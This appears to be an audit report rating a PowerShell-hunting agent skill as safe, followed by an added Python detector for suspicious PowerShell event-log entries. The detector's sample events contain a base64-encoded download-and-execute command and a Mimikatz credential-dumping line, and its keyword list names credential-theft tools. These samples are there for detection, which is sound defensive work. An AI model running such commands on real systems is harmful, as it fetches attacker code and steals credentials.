hunting-for-anomalous-powershell-execution

Pass

Audited by Gen Agent Trust Hub on Apr 7, 2026

Risk Level: SAFE
Flags: EXTERNAL_DOWNLOADS
Full Analysis
  • [SAFE]: The skill's code was thoroughly analyzed and found to perform only the forensic analysis tasks described in its documentation. No evidence of hidden malicious logic, obfuscation, or persistence mechanisms was identified.
  • [EXTERNAL_DOWNLOADS]: The skill's scripts/agent.py depends on the third-party Python packages python-evtx and lxml. These are widely used, standard libraries for parsing Windows event logs (EVTX) and processing XML data.
  • [DATA_EXFILTRATION]: Static analysis of scripts/agent.py found no network communication modules (requests, urllib, socket or similar), so the script has no built-in path for sending the analyzed event data off the local system.
  • [COMMAND_EXECUTION]: The script processes data using native Python logic and library calls. It does not use subprocess, os.system, or any other mechanism to execute external commands.
  • [CREDENTIALS_UNSAFE]: No hardcoded API keys, passwords, or other sensitive credentials were found within the repository files. The script is designed to detect credential theft keywords in logs rather than storing credentials itself.
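The approach the audit attributes to the skill (parse Windows event logs, match credential-theft and other suspicious keywords, no network and no subprocess) can be illustrated with a small added example. This is not the audited skill's code and does not reproduce scripts/agent.py. It assumes PowerShell Script Block Logging events (Event ID 4104, plus 4103 module-logging events) rendered as XML in the form python-evtx's `Record.xml()` returns, uses the standard-library XML parser in place of lxml so it runs without either package, and the keyword list, the regex for `-EncodedCommand` arguments and the sample events are all constructed for the demo.

```python
# Added example, not the audited skill's code. Hunts suspicious PowerShell
# activity in Script Block Logging events (4104) and module logging events
# (4103) rendered as XML, the form python-evtx's Record.xml() returns.
# Standard-library only: no EVTX file, no lxml, no network, no subprocess.
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Hypothetical keyword list for the demo; matched case-insensitively.
SUSPICIOUS = [
    "invoke-mimikatz", "sekurlsa", "lsass", "dumpcreds", "get-keystrokes",
    "downloadstring", "net.webclient", "iex ", "invoke-expression",
    "frombase64string", "-encodedcommand", " -enc ", "bypass",
]

# -EncodedCommand (and its -enc / -e short forms) takes base64 of UTF-16LE text.
ENC_RE = re.compile(r"(?i)(?:-encodedcommand|-enc|-e)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_commands(text):
    """Return the decoded payload of every -EncodedCommand argument in text."""
    out = []
    for m in ENC_RE.finditer(text):
        try:
            out.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            pass  # not a real payload; the raw text is still keyword-scanned
    return out


def parse_event(xml_text):
    """Extract EventID, Computer and the EventData name/value pairs from one event."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    return {
        "event_id": int(system.find("e:EventID", NS).text),
        "computer": system.find("e:Computer", NS).text,
        "data": {d.get("Name"): (d.text or "")
                 for d in root.findall("e:EventData/e:Data", NS)},
    }


def hunt(xml_events):
    """Return a finding for each event whose script text or decoded payload matches."""
    findings = []
    for xml_text in xml_events:
        ev = parse_event(xml_text)
        # 4104 carries ScriptBlockText; 4103 carries the command line in Payload.
        text = ev["data"].get("ScriptBlockText") or ev["data"].get("Payload", "")
        decoded = decode_encoded_commands(text)
        corpus = [text] + decoded  # scan the raw text and any decoded payloads
        hits = sorted({kw.strip() for kw in SUSPICIOUS
                       for chunk in corpus if kw in chunk.lower()})
        if hits:
            findings.append({"event_id": ev["event_id"], "computer": ev["computer"],
                             "hits": hits, "decoded": decoded})
    return findings


def _event(event_id, field, value, computer="WS01.corp.example"):
    """Build a minimal event in the python-evtx XML rendering (constructed sample)."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        f"<System><EventID>{event_id}</EventID><Computer>{computer}</Computer></System>"
        f'<EventData><Data Name="{field}">{escape(value)}</Data></EventData></Event>'
    )


# Constructed sample: a benign block, a Mimikatz block, and an encoded downloader.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    _event(4104, "ScriptBlockText", "Get-ChildItem C:\\Users | Sort-Object Length"),
    _event(4104, "ScriptBlockText", "Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'"),
    _event(4103, "Payload",
           "powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc " + ENCODED),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['computer']} event {f['event_id']}: {', '.join(f['hits'])}")
```

The encoded-command branch is the part a plain keyword grep misses: the downloader in the third sample event only becomes visible after the base64/UTF-16LE payload is decoded, so both the raw text and every decoded payload are scanned.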
Audit Metadata
Risk Level: SAFE
Analyzed: Apr 7, 2026, 06:47 PM